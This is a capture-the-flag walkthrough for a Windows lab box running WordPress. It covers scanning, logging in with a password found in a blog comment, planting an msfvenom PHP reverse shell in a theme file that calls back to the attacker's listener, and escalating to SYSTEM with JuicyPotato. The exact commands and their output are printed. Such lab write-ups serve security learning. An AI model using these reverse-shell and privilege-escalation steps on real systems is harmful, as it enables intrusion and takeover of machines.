Retro for CTF of wordpress

Retro is a free Windows box offered .

What you’ll learn

  • Importance of different wordlists
  • Consequence of SeImpersonatePrivilege

Port scans

One thing I noticed with is that the openvpn tunnel created is a tun0 interface, rather than tap0 or the hypervisor-created eth0. This poses some problems for Unicornscan which seems to work over a network-L2 interface but not a L3 one. This was discussed in a HTB thread here. Unicornscan gave the error

Send exiting main didnt connect, exiting: system error Interrupted system call

Consequently I stuck with masscan, which worked for TCP scans. UDP scans, well are protocol-based and don’t seem to work for most scanners, including nmap (see here for an open TFTP port nmap didn’t detect). nmap is probably your best chance though.

root@Kali:~/TryHackme/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-28 13:32:10 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.208.198                                   
Discovered open port 3389/tcp on 10.10.208.198           

Just two ports. Perfect. TCP service scan here. There seems to be nothing special though, from the nmap results.

Web scans

This seemed to return nothing too.

amap v5.4 (www.thc.org/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode

Protocol on 10.10.208.198:80/tcp matches http
Protocol on 10.10.208.198:80/tcp matches http-apache-2
Protocol on 10.10.208.198:80/tcp matches http-iis

Unidentified ports: none.

amap v5.4 finished at 2020-03-28 21:54:36


root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.208.198:80
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/28 21:55:16 Starting gobuster
===============================================================
===============================================================
2020/03/28 21:56:47 Finished
===============================================================

Routed through Burp, use old header
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt -p http://localhost:8081
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.208.198:80
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] Proxy:          http://localhost:8081
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/28 22:04:01 Starting gobuster
===============================================================
===============================================================
2020/03/28 22:08:03 Finished
===============================================================

Took me some time, but apparently the wordlist used I used was insufficient. If I had used /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt instead I would have found this.

root@Kali:~/TryHackme/Retro# gobuster dir -u http://192.168.92.134:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.218.121:80
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/29 14:57:25 Starting gobuster
===============================================================
/retro (Status: 301)
/Retro (Status: 301)
===============================================================
2020/03/29 14:57:43 Finished
===============================================================

That or got the hint somehow that the name of the box could be an important Web path. Further scanning down this path gave

root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.121:80/retro -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.208.121:80/retro
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/28 22:15:06 Starting gobuster
===============================================================
/index.php (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2020/03/28 22:16:39 Finished
===============================================================

So we have a WP blog. But for some reason with Burp as proxy I kept getting re-directed to localhost:80 which of course loaded nothing so I had to do this to redirect it back.

root@Kali:~/TryHackme/Retro# ssh -L 80:10.10.208.121:80 localhost
root@localhost's password: 
Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sat Mar 28 20:35:25 2020 from ::1

That’s SSH local port forwarding where you connect one of your machine own ports to a remote servers’ other port, like

ssh -L 8080:www.ubuntuforums.org:80 localhost

Now you can visit http://localhost:8080 to go to http://www.ubuntuforums.org:80

After doing this I could visit http://10.10.208.121/retro/wp-admin. If you didn’t encounter this problem don’t do this. After I upgraded Burpsuite, the problem stopped. The site looks like this

Now I had to specify all my scans to direct to localhost:80 Since we have a WP site I did wpscan, which annoyingly upgraded to a freemium model limited to 5 results per day. Results here. This didn’t lead anywhere since the vulnerabilities identified were XSS or required you already had some login access to the WP site.

WordPress login

The only way forward, was to notice this comment.

which said

Wade
December 9, 2019
Leaving myself a note here just in case I forget how to spell it: parzival

If you try it on the WordPress admin login page (/retro/wp-login.php) it works (user: Wade, Password = parzival)

Exploitation

Checking the Users section, we see quickly that Wade is a WP admin. Great.

That means we have rights to edit WP themes and replace it with our own code. Typically the WordPress exploitation to shell vector requres two things.

  1. Uploading a reverse Web shell.
  2. LFI or able to browse to view that shell.

The theme used is 90’s retro. Going to Apperance -> Theme Editor we can choose whichever page to edit. The best choice is usually 404.php since that page loads whenever a non-existent Web page is queried on the WP site and it gets redirected there, triggering the reverse shell. But this time, I chose another page, page.php.

Now we just need a PHP reverse shell, so get it via msfvenom.

root@Kali:~/TryHackme/Retro# msfvenom -a php --platform php -p php/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php
No encoder or badchars specified, outputting raw payload
Payload size: 3044 bytes
Saved as: shell.php

Just copy and paste the entire PHP code, overwriting the existing code completely. Don’t leave any of the original code behind. I say this because when I first did it, I couldn’t get the reverse shell to trigger until I completely overwrote it. Ok, now we just need to find a way to view page.php Where could that be?

Now I could access twentynineteen theme readme.txt here

http://10.10.218.121/retro/wp-content/themes/twentynineteen/readme.txt

so I just need to figure out Web path for 90’s Retro theme. After some Googling, I found its Github repo. The URL suggested the path could be /90s-retro/. Accessing http://10.10.218.121/retro/wp-content/themes/90s-retro/readme.txt works! So the uploaded reverse shell would be at http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

root@Kali:~/TryHackme/Retro# curl http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

Our listener (I switched from port 53 to 443 with another shell)

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344
whoami && ipconfig /all
nt authority\iusr

Windows IP Configuration

   Host Name . . . . . . . . . . . . : RetroWeb
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com
                                       eu-west-1.compute.internal

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : AWS PV Network Device #0
   Physical Address. . . . . . . . . : 02-95-6F-53-23-2E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM
   Lease Expires . . . . . . . . . . : Saturday, March 28, 2020 8:29:56 AM
   Default Gateway . . . . . . . . . : 10.10.0.1
   DHCP Server . . . . . . . . . . . : 10.10.0.1
   DHCPv6 IAID . . . . . . . . . . . : 100805359
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
   DNS Servers . . . . . . . . . . . : 10.0.0.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred) 
   Default Gateway . . . . . . . . . : ::
   DHCPv6 IAID . . . . . . . . . . . : 134217728
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
   NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

As per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you’re going down that route, I prefer FreeRDP over rdesktop. This command is my go to

root@Kali:~/TryHackme/Retro# xfreerdp /v:10.10.218.121:3389 /u:Wade /p:parzival /size:90%

Where /size scales it to 90% of your desktop resolution. Experiment and see what works for you. Just for the record, I tried other PHP reverse shells such as this and Pentestmonkey’s (replacing with cmd) but it didn’t work. Only msfvenom’s worked for me.

Post-exploitation

There are a few ways to achieve SYSTEM here. The intended method, explained here didn’t work for me. What worked was a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR or the IIS user). winPEAS highlights this too.

whoami /all

USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

We have SeImpersonatePrivilege privileges. So that means we can use Juicy Potato. Call it like this

JuicyPotato.exe -l 443 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\temp\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

We should get a SYSTEM shell

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv && ipconfig
whoami /priv && ipconfig

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5
   IPv4 Address. . . . . . . . . . . : 10.10.218.121
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586
   Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud

您是第8239367 位访客, 您的IP是:[3.237.254.197]